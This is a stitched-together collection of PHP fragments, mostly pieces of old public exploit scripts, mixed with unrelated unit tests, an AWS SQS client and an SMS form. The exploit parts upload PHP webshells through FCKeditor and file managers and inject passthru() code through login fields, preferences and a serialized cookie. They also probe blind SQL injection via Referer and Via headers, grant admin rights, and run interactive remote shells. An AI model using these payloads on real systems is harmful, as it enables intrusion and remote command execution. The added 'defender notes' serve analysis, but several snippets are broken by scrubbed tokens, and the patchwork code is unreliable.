function upload()
{
    // Tries each extension in $file_ext as a double-extension filename
    // (sh.php.<ext>) against the FCKeditor "mcpuk" upload connector, then
    // fetches the file back and returns the first extension for which the
    // server executed it (response carries the "_code_" marker but not the
    // literal word "print"). Returns false when no extension worked.
    // Reads globals $host and $path; prints progress and die()s on an upload
    // error code other than 0 or 201.
    // Defender notes: the request is a multipart POST to
    // .../connectors/php/config.php?Command=FileUpload with the fixed boundary
    // "12345"; the planted file reads its command from the HTTP_CMD request
    // header. Rejecting double extensions at upload time and never executing
    // "*.php.*" names as PHP are the relevant mitigations.
    global $host, $path;
    $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
    $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
    foreach ($file_ext as $ext) {
        print "\n[-] Trying to upload with .{$ext} extension...";
        // Hand-built multipart/form-data body; strlen() is a byte count, which
        // is what Content-Length needs.
        $data = "--12345\r\n";
        $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
        $data .= "Content-Type: application/octet-stream\r\n\r\n";
        $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
        $data .= "--12345--\r\n";
        $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Length: " . strlen($data) . "\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $data;
        // The connector answers with a JavaScript OnUploadCompleted(code,'name')
        // callback; $html[1] is the numeric code. When the pattern does not
        // match, $html is empty and intval(null) == 0 passes the check below,
        // so a non-matching response is mistaken for a successful upload.
        preg_match("/OnUploadCompleted\\((.*),'(.*)'\\)/i", http_send($host, $packet), $html);
        if (!in_array(intval($html[1]), array(0, 201))) {
            die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
        }
        $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $html = http_send($host, $packet);
        // eregi() is the PHP 5 POSIX regex API (removed in PHP 7). "print"
        // absent and "_code_" present means the file was executed rather than
        // served back as text.
        if (!eregi("print", $html) and eregi("_code_", $html)) {
            return $ext;
        }
        sleep(1);
    }
    return false;
}
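 protected function execute()
 {
     // Posts the fixture .dat file that sits next to this test file to the
     // ulog upload endpoint and expects the JSON reply {"errno":0}.
     // The path is concatenated OUTSIDE the JSON text: writing
     // dirname(__FILE__) inside the string literal sends it as literal text,
     // which is not valid JSON, so json_decode() yields null and no datafile
     // is posted at all.
     $dataFile = dirname(__FILE__) . '/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat';
     $postParam = array(
         'ver' => '2',
         'pd' => 'map',
         'im' => '2',
         'os' => 'android',
         // "@<path>" is the legacy cURL "upload this file" marker; presumably
         // http_send() forwards it as such — confirm against its implementation.
         'datafile' => '@' . $dataFile,
     );
     $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
     $res = "{\"errno\":0}";
     $this->assert_json(__LINE__, $data, $res);
 }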
 protected function execute()
 {
     // Posts the fixture .dat file (absolute path on the test host) to the
     // ulog upload endpoint and expects the JSON reply {"errno":0}.
     // "@<path>" is the legacy cURL "upload this file" marker; presumably
     // http_send() honours it — confirm against its implementation.
     $postParam = array(
         'ver' => '2',
         'pd' => 'map',
         'im' => '2',
         'os' => 'android',
         'datafile' => '@/home/map/apps/servertest/lighttpd/htdocs/mysite/application/controllers/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat',
     );
     $url = 'http://10.99.33.39:8202/ulog/public/up.php';
     $expected = '{"errno":0}';
     $reply = http_send($url, $postParam);
     $this->assert_json(__LINE__, $reply, $expected);
 }
 protected function execute()
 {
     // Posts the fixture 20130913100335.dat next to this test file to the
     // ulog upload endpoint and expects the JSON reply {"errno":0}.
     // "@<path>" is the legacy cURL "upload this file" marker; presumably
     // http_send() honours it — confirm against its implementation.
     $dataFile = dirname(__FILE__) . '/20130913100335.dat';
     $post = '{"ver":"2","pd":"map","im":"2","os":"android","datafile":"@' . $dataFile . '"}';
     $postParam = json_decode($post, true);
     $reply = http_send('http://10.99.33.39:8202/ulog/public/up.php', $postParam);
     $this->assert_json(__LINE__, $reply, '{"errno":0}');
 }
function check_query($sql)
{
    // Blind-injection oracle: $sql is sent verbatim in the Referer request
    // header and the function returns true when the page answers with
    // "DENIED", false otherwise. Reads globals $host and $path.
    // Defender note: the probe lives in the Referer header, so logging or
    // filtering that inspects only the query string and body never sees it.
    global $host, $path;
    $packet = "GET {$path} HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Referer: {$sql} \r\n";
    $packet .= "Keep-Alive: 300\r\n";
    $packet .= "Connection: keep-alive\r\n\r\n";
    $html = http_send($host, $packet);
    // preg_match() returns 0/1; the ternary only turns that into a bool.
    return preg_match("/DENIED/", $html) ? true : false;
}
function get_path()
{
    // Recovers the web root's filesystem path from a PHP error page: requesting
    // tiki-rss_error.php directly makes it fail, and the
    // "in <b>/abs/path/tiki-rss" fragment of the error text is captured.
    // Reads globals $host and $path; die()s when no such fragment appears.
    // Defender note: this disclosure disappears once errors are logged rather
    // than displayed (display_errors=Off).
    global $host, $path;
    $packet = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) {
        die("\n[-] Path not found!\n");
    }
    return $m[1];
}
function get_path()
{
    // Recovers the install's filesystem path from a displayed PHP error:
    // requesting ../doceboCore/class/class.conf_fw.php directly makes it fail
    // and the "in <b>...</b> on" fragment of the error text is captured.
    // Reads globals $host and $path.
    // Defender note: display_errors=Off removes the disclosure.
    global $host, $path;
    $packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    // No match leaves $found empty; $found[1] is then an undefined index and
    // the returned value degenerates to substr($path, 1).
    preg_match("/in <b>(.*)<\\/b> on/i", http_send($host, $packet), $found);
    // Keep everything before the first "docebo" in the captured path:
    // strstr() returns the tail starting at "docebo", so subtracting its
    // length leaves the prefix.
    $ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo")));
    // Append the request path without its leading "/".
    $ret .= substr($path, 1);
    return $ret;
}
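function sqs_client_enqueue($data, $config)
{
    // Sends one SigV4-signed SQS SendMessage request with json_encode($data)
    // as the message body.
    //
    // Returns an array holding exactly one of:
    //   'id'    => the MessageId string returned by SQS, or
    //   'error' => a human-readable failure description.
    //
    // Config keys read: sqs_queue_url, aws_access_key_id, aws_secret_access_key,
    // sqs_region (optional; falls back to s3_region, then "us-east-1"),
    // log_api_response (truthy => the raw response is written via log_file()).
    // Relies on __sqs_client_version_four(), http_send(), log_file() and the
    // DATE_FORMAT_ISO8601_BASIC constant defined elsewhere in the project.
    $result = array();
    $err = '';

    $variables = array(
        'Action' => 'SendMessage',
        'MessageBody' => json_encode($data),
        'Version' => '2012-11-05',
    );

    // Region of the credential scope: the SQS region when configured, else the
    // S3 bucket's region, else the SQS default. The SAME value must feed both
    // the signing key and the Authorization header's scope, otherwise the
    // signature can never verify — so it is resolved once, before signing.
    // (Assumes the fifth argument of __sqs_client_version_four() is the
    // signing region, as its positional use suggests; its definition is not
    // in view.)
    if (!empty($config['sqs_region'])) {
        $region = $config['sqs_region'];
    } elseif (!empty($config['s3_region'])) {
        $region = $config['s3_region'];
    } else {
        $region = 'us-east-1';
    }

    $parsed_url = parse_url($config['sqs_queue_url']);
    $headers = array(
        'Host' => strtolower($parsed_url['host']),
        'X-Amz-Date' => gmdate(DATE_FORMAT_ISO8601_BASIC),
    );
    $signature = __sqs_client_version_four($config['aws_secret_access_key'], $config['sqs_queue_url'], $variables, $headers, $region, 'post');
    // YYYYMMDD prefix of the X-Amz-Date timestamp is the scope date.
    $date_str = substr($headers['X-Amz-Date'], 0, 8);
    $headers['Authorization'] = "AWS4-HMAC-SHA256 Credential={$config['aws_access_key_id']}/{$date_str}/{$region}/sqs/aws4_request, SignedHeaders=host;x-amz-date, Signature={$signature}";

    $post_result = http_send($config['sqs_queue_url'], $variables, $headers);
    $body = $post_result['result'];
    if ($body && $config['log_api_response']) {
        log_file("sqs response:\n" . print_r($body, 1), $config);
    }

    if ($post_result['error']) {
        $err = 'Could not make sqs request ' . $config['sqs_queue_url'] . ' ' . $post_result['error'];
    } elseif (!$body) {
        $err = 'Got no response from sqs request';
    } else {
        // Parse WITHOUT LIBXML_NOENT: entity substitution would let a crafted
        // response pull in external entities (XXE), and SQS replies never need
        // it. libxml errors are collected and discarded instead of being
        // @-suppressed, so a malformed body still yields a clean
        // "Could not parse" result.
        $previous = libxml_use_internal_errors(true);
        $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOCDATA);
        libxml_clear_errors();
        libxml_use_internal_errors($previous);

        if (!is_object($xml)) {
            $err = 'Could not parse sqs response';
        } elseif (count($xml->Error)) {
            if (!$config['log_api_response']) {
                // Not logged above, so record the failing response once here.
                log_file("sqs response:\n" . $body, $config);
            }
            $err = 'Got error in sqs response';
        } elseif (!(is_object($xml->SendMessageResult) && is_object($xml->SendMessageResult->MessageId))) {
            $err = 'Got no MessageId in sqs response';
        } else {
            $result['id'] = (string) $xml->SendMessageResult->MessageId;
        }
    }

    if ($err) {
        $result['error'] = $err;
    }
    return $result;
}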
function check_query($sql)
{
    // Blind-injection oracle for the guestbook "insert" action: $sql is sent
    // verbatim in the Via request header and the function returns true when
    // the response does NOT echo "UNION/**/SELECT" back, false when it does.
    // Reads globals $host and $path.
    // Defender note: the probe travels in a non-standard header (Via), so
    // inspection limited to the query string and body never sees it.
    global $host, $path;
    $payload = "gb_name=null&gb_email=foo%40bar.com&task=insert";
    $packet = "POST {$path}index.php?option=guestbook HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Via: {$sql}\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    // "!" turns preg_match()'s 0/1 into a bool: true means pattern absent.
    return !preg_match("/UNION\\/\\*\\*\\/SELECT/", http_send($host, $packet));
}
function inject_code()
{
    // Submits a PHP snippet as the p_user field of the admin login form
    // (reads globals $host and $path); the response is discarded.
    // NOTE(review): the `$payload = ...` line below does not parse as shown —
    // a "******" token has replaced part of it (the p_pass value and the start
    // of the `$packet = ` assignment), which looks like a corpus
    // secret-scrubbing artefact rather than the original source.
    // Defender note: the snippet reads its command from the HTTP_CMD request
    // header; a login field containing "<?php" is a clear log signature, and
    // the bug class is writing request data into an executable file.
    global $host, $path;
    $code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
    $payload = "p_user={$code}&p_pass="******"POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    http_send($host, $packet);
}
function inject_php()
{
    // Posts a feed_order value that closes the PHP context it is written into
    // by set-prefs.php and appends a passthru() of the base64-decoded HTTP_CMD
    // request header, bracketed by "<<" / ">>" markers; "%23" decodes to "#",
    // which comments out whatever follows. Authenticates with the user_name /
    // user_password_hash cookies taken from globals $user / $pass and die()s
    // when the server redirects to login.php (bad credentials).
    // Defender note: a preference value containing "passthru(" or
    // "$_SERVER[HTTP_CMD]" is the observable here; the bug class is writing
    // user preferences into an executable PHP file.
    global $host, $path, $user, $pass;
    $data = "feed_order=\"]));}print('<<');passthru(base64_decode(\$_SERVER[HTTP_CMD]));print('>>');%23";
    $packet = "POST {$path}set-prefs.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: user_name={$user}; user_password_hash={$pass}\r\n";
    $packet .= "Content-Length: " . strlen($data) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $data;
    if (preg_match("/login.php/", http_send($host, $packet))) {
        die("\n[-] Incorrect username or password!\n");
    }
}
function login()
{
    // Logs in through index.php?a=login with globals $username / $password
    // and returns preg_match()'s 0/1 for $pattern against the response.
    // NOTE(review): the `$pattern = ...` line below does not parse as shown;
    // a "******" token replaced part of it (looks like a corpus
    // secret-scrubbing artefact, not the original source), so what the
    // response is actually checked for cannot be told from here.
    global $host, $path, $username, $password;
    $data = "user={$username}&pass={$password}&submit=1&request_uri=foo";
    $packet = "POST {$path}index.php?a=login HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($data) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $data;
    $pattern = "/pass="******"/";
    return preg_match($pattern, http_send($host, $packet));
}
文件: 6005.php 项目: iusky/fullypwnd
function check_target()
{
    // Probes slideshow_full.php with album_name=%27 (a single quote) and
    // treats a displayed SQL error containing "FROM <prefix>_m" as
    // confirmation; the captured table prefix is stored in global $prefix
    // for later use. Reads globals $host and $path; prints the verdict and
    // die()s on failure.
    // Defender notes: the confirmation relies on the database error text
    // being shown to the client; the die() message itself records that
    // magic_quotes_gpc=on defeats the probe. Suppressing error output and
    // parameterising the query are the application-side fixes.
    global $host, $path, $prefix;
    print "\n[-] Checking {$host}...";
    $packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) {
        print "vulnerable!\n";
    } else {
        die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
    }
    // $match is only populated on the match branch; die() above keeps the
    // undefined-variable read from being reached otherwise.
    $prefix = $match[1];
}
function check_target()
{
    // see if MySQL version is >= 4.1 (subqueries support) or other error
    // Requests new_images.php with a subquery in the "order" parameter and
    // expects the normal page footer ("The LinPHA developers") back; any
    // other response is taken as an old MySQL or an error. Reads globals
    // $host and $path; prints the verdict and die()s on failure.
    // Defender note: a raw "(SELECT/**/1)" in a sort parameter is the
    // signature; an allow-list of sortable columns removes the bug class.
    global $host, $path;
    print "\n[-] Checking {$host}...";
    $pck = "GET " . $path . "new_images.php?order=id,(SELECT/**/1) HTTP/1.1\r\n";
    $pck .= "Host: " . $host . "\r\n";
    $pck .= "Keep-Alive: 300\r\n";
    $pck .= "Connection: keep-alive\r\n\r\n";
    $buff = http_send($host, $pck);
    // strpos() returns an offset, so "!strpos()" is also true for a match at
    // offset 0 — harmless here because the buffer starts with the HTTP
    // status line, but "=== false" is the safe form.
    if (!strpos($buff, "The LinPHA developers")) {
        die("\n\n[-] Error... Probably wrong MySQL version!\n");
    } else {
        print " OK!\n";
    }
}
print "\n+------------------------------------------------------------+\n";
// CLI entry: host, path, username and password are positional arguments.
// $argv['0'] is the same element as $argv[0] (numeric-string key).
if ($argc < 5) {
    print "\nUsage......: php {$argv['0']} <host> <path> <username> <password>\n";
    print "\nExample....: php {$argv['0']} localhost / user pass";
    print "\nExample....: php {$argv['0']} localhost /dolphin/ user pass\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
// Step 1: log in through member.php and capture the memberID /
// memberPassword values from the response text (they are reused as the
// session cookie below).
$payload = "ID={$argv[3]}&Password={$argv[4]}";
$packet = "POST {$path}member.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) {
    die("\n[-] Login failed!\n");
}
// Step 2: the "bubbles" parameter carries a PHP fragment that closes the
// surrounding call ("1);") and runs the base64-decoded HTTP_CMD request
// header through passthru(). "Cmd: %s" is a sprintf() placeholder filled
// per command below; a literal "%" in $path would also be interpreted by
// sprintf().
// Defender notes: a request to member_menu_queries.php whose bubbles value
// contains "passthru(" / "$_SERVER[HTTP_CMD]", together with a custom "Cmd"
// header, is the signature; the bug class is evaluating request data as PHP.
$phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])";
$packet = "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
// Interactive loop: "exit" leaves; otherwise the text between the header
// block and the '{"Friends' JSON is printed, and a non-matching response
// ends the script.
while (1) {
    print "\ndolphin-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") {
        break;
    }
    preg_match("/\r\n\r\n(.*)\\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
function random_mkdir()
{
    // Creates a folder with a uniqid() name under $rootdir through the file
    // manager's ajax_create_folder.php and returns that name; the response is
    // not checked. Reads globals $host, $path, $fileman and $rootdir.
    // uniqid() is time-derived, not random: fine for a unique name, but the
    // "random" in this function's name should not be read as unguessable.
    global $host, $path, $fileman, $rootdir;
    $dirname = uniqid();
    $payload = "new_folder={$dirname}&currentFolderPath={$rootdir}";
    $packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";
    http_send($host, $packet);
    return $dirname;
}
    return stream_get_contents($sock);
}
print "\n+-----------------------------------------------------+";
print "\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------+\n";
// CLI entry: host and path are positional arguments.
if ($argc < 3) {
    print "\nUsage......: php {$argv['0']} <host> <path>\n";
    print "\nExample....: php {$argv['0']} localhost /";
    print "\nExample....: php {$argv['0']} localhost /aidicms/\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
// A form value holding a complete "<?php ... ?>" snippet is posted to the
// TinyMCE ajaxfilemanager's ajax_create_folder.php; the later requests to
// inc/data.php rely on that script having written the value into data.php
// (the write itself is not visible here). The snippet runs the
// base64-decoded HTTP_CMD request header through passthru().
$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
// "Cmd: %s" is a sprintf() placeholder filled per command below; a literal
// "%" in $path would also be interpreted by sprintf().
// Defender notes: a POST to ajax_create_folder.php containing "<?php" /
// "passthru(", and requests to inc/data.php carrying a custom "Cmd" header,
// are the signatures; the bug class is writing request data into a PHP file.
$packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
// Interactive loop: "exit" leaves; otherwise everything after the "_code_"
// marker in the response is printed, and a missing marker ends the script.
while (1) {
    print "\naidicms-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") {
        break;
    }
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
// Continuation: $headers, $payload, $newuser, $newpass, $cookie and the
// http_send() / http_recv() helpers are defined before this point (outside
// this view). http_send() here takes (host, port, raw request) and returns
// a socket that is closed with fclose().
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
sleep(2);
print "Granting admin privileges for user [ {$newuser} ]\n";
// Fetch the staff list with the AUTH_COOKIE session and collect every
// "php?u=<id>" link; the highest id is assumed to belong to the user just
// created.
$headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n\r\n";
preg_match_all('/php\\?u=(\\d+)/', http_recv(http_send($host, 80, $headers)), $matches);
// max() of an empty array warns (PHP 5/7) or throws ValueError (PHP 8)
// before is_numeric() gets a chance to reject the result.
if (!is_numeric(max($matches[1]))) {
    die('Failed.');
}
sleep(2);
// Edit that user with chk_admin=on, which makes the account an admin.
// Defender note: the edit is issued for an arbitrary "u" picked from the
// listing; the application-side fix is an authorization check that ties
// staff edits (and the admin flag) to the caller's own privileges.
$payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=" . urlencode('Save Changes');
$headers = "POST {$path}admin/edit/index.php?u=" . max($matches[1]) . " HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
print "Success!\n\n";
print "http://{$host}{$path}login.php\n";
print "user: {$newuser}\n";
print "pass: {$newpass}\n";
?>
 #
 ### [ dun / 2012 ] ###############################
function set_NowritableServer()
{
    // Switches php-stats' "write files on server" mode: fetches the admin
    // preferences page (authenticated with the pass_cookie from global $pwd)
    // and, when the Italian or English label for that mode is present, POSTs
    // change_mode=1 to admin.php. Reads globals $host, $path, $prefix, $pwd
    // ($prefix is declared here but not used).
    // NOTE(review): the POST below carries no Cookie header although the GET
    // does; whether admin.php accepts it unauthenticated cannot be told from
    // here.
    global $host, $path, $prefix, $pwd;
    // we need to set $NowritableServer=1 in /option/php-stats_mode.php
    $s1 = "/con scrittura di files sul Server/";
    $s2 = "/the write files on server mode/";
    $pck = "GET {$path}admin.php?action=preferenze HTTP/1.1\r\n";
    $pck .= "Host: {$host}\r\n";
    $pck .= "Cookie: pass_cookie={$pwd}\r\n";
    $pck .= "Keep-Alive: 300\r\n";
    $pck .= "Connection: keep-alive\r\n\r\n";
    $html = http_send($host, $pck);
    if (preg_match($s1, $html) || preg_match($s2, $html)) {
        $data = "change_mode=1";
        $pck = "POST {$path}admin.php HTTP/1.1\r\n";
        $pck .= "Host: {$host}\r\n";
        $pck .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $pck .= "Content-Length: " . strlen($data) . "\r\n";
        $pck .= "Keep-Alive: 300\r\n";
        $pck .= "Connection: keep-alive\r\n\r\n";
        $pck .= $data;
        http_send($host, $pck);
    }
}
// Continuation: $packet, $data, $host and $path are built before this point
// (outside this view); these two lines finish a multipart upload request.
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
// The upload handler answers with OnUploadCompleted(code,"...","...",...):
// $html[1] is the numeric code, $html[2] is shown as the upload location and
// $html[3] is the stored name requested below. When the pattern does not
// match, $html is empty and intval(null) == 0 passes the check, so a
// non-matching response is mistaken for success.
preg_match("/OnUploadCompleted\\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) {
    die("\n[-] Upload failed! (Error {$html[1]})\n");
} else {
    print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
}
// STDIN is already a predefined constant in CLI PHP, so this define() is
// redundant (and passes the resource itself, not the name "STDIN").
define(STDIN, fopen("php://stdin", "r"));
// Interactive loop: each command is base64-encoded into a "Cmd" request
// header for the stored file under datacenter/media/; the response must
// contain "_code_" and not the literal "print" (eregi() is PHP 5 only) or
// the script dies, and the text after the first "_code_" is printed.
// Defender notes: a GET under datacenter/media/ with a custom "Cmd" header
// is the signature; storing uploads where they can be executed as PHP is
// the bug class.
while (1) {
    print "\nstack-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $output = http_send($host, $packet);
        if (eregi("print", $output) || !eregi("_code_", $output)) {
            die("\n[-] Exploit failed...\n");
        }
        $shell = explode("_code_", $output);
        print "\n{$shell[1]}";
    } else {
        break;
    }
}
?>

# milw0rm.com [2008-05-29]
文件: sendsms.php 项目: armic/erpts
<head>
<title>SMS Message Sender</title>
</head>
<body bgcolor="#FFFFFF" text="#000000">

<?php 
include "config.inc";
include "functions.inc";
echo $sendTo;
echo "<hr>";
echo $message;
exit;
if ($submit) {
    echo "Sending the SMS Text message <b>\"{$text}\"</b> to the phone <b>{$to}</b>...<br>\n";
    $URL = "/cgi-bin/sendsms?username="******"&password="******"&from=" . GLOBAL_SENDER . "&to={$to}&text=" . urlencode($text);
    http_send($URL, SENDSMS_PORT);
    echo "<address><a href=\"{$PHP_SELF}\">Back to Send SMS</a></address>\n";
} else {
    ?>

<h1>SMS Message Sender</h1>
<form name="sendsms" method="post" action="<?php 
    echo "{$PHP_SELF}";
    ?>
">
<p>
Telephone number:
<br>
<input type="text" size="30" name="to">
</p>
<p>
// Learn the cookie-name prefix from the "Cookie: <prefix>session" text on
// the front page so the member_id cookie sent later uses the right name;
// empty string when the text is absent.
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
/**
 * Minimal stand-in for the application's db_driver_mysql class carrying only
 * the $obj property; the hand-written serialized $payload further down has
 * exactly this shape.
 */
class db_driver_mysql
{
    public $obj = array(
        'use_debug_log' => 1,
        'debug_log' => 'cache/sh.php',
    );
}
# Super bypass by @i0n1c
// Hand-written serialized array holding one db_driver_mysql object whose
// debug log is pointed at cache/sh.php ("O:+15" is the length quirk the
// comment above refers to). It is sent in the member_id cookie; presumably
// the server unserialize()s it and its debug logging then writes the request
// (including the $phpcode query string) into cache/sh.php — the later GET of
// that file relies on it, but the write path is not visible here.
$payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
// Uses the "<?" short tag; the check further down die()s when the server has
// short_open_tag disabled and echoes the tag back literally.
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
// "Cmd: %s" is a sprintf() placeholder filled per command below; a literal
// "%" in $path would also be interpreted by sprintf().
// Defender notes: unserialize() of cookie data is the root cause; a
// member_id cookie starting with "a:1:{i:0;O:" and a request URI containing
// "<?" are the signatures.
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match('/<\\?error/', http_send($host, $packet))) {
    die("\n[-] short_open_tag disabled!\n");
}
// Interactive loop: "exit" leaves; otherwise the text after the "___"
// marker in the response is printed, and a missing marker ends the script.
while (1) {
    print "\nipb-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") {
        break;
    }
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
 protected function execute()
 {
     // Registers a slave against loc-monitor with fixed query parameters and
     // an empty POST body, then expects the exact JSON reply below (including
     // the sid value).
     $url = 'http://10.99.33.40:8080/loc-monitor/slave.php?type=reg&ts=10982345&sign=cc&cuid=SLAVE3559A98E6E0894F17F08F4877CD|933 861000141225&os=android&pt=1&ap=map';
     $expected = '{"error":0,"msg":"","data":{"sid":"25ce7a038f015df67e96231000141225"},"t":23}';
     $reply = http_send($url, '');
     $this->assert_json(__LINE__, $reply, $expected);
 }
文件: 8287.php 项目: iusky/fullypwnd
function upload()
{
    // Uploads poc.php through the "?L=interact.file&id=0" form, then lists
    // system/cache/temp/ to learn the stored name (a numeric prefix followed
    // by "_poc.php"). Returns that name; die()s when the listing is denied.
    // Reads globals $host and $path.
    // Defender notes: the directory listing on the cache/temp folder is what
    // makes the stored name recoverable; disabling listings and keeping
    // uploads outside the web root (or non-executable) are the mitigations.
    // The planted file reads its command from the HTTP_CMD request header.
    global $host, $path;
    // Hand-built multipart body with the fixed boundary "o0oOo0o".
    $payload = "--o0oOo0o\r\n";
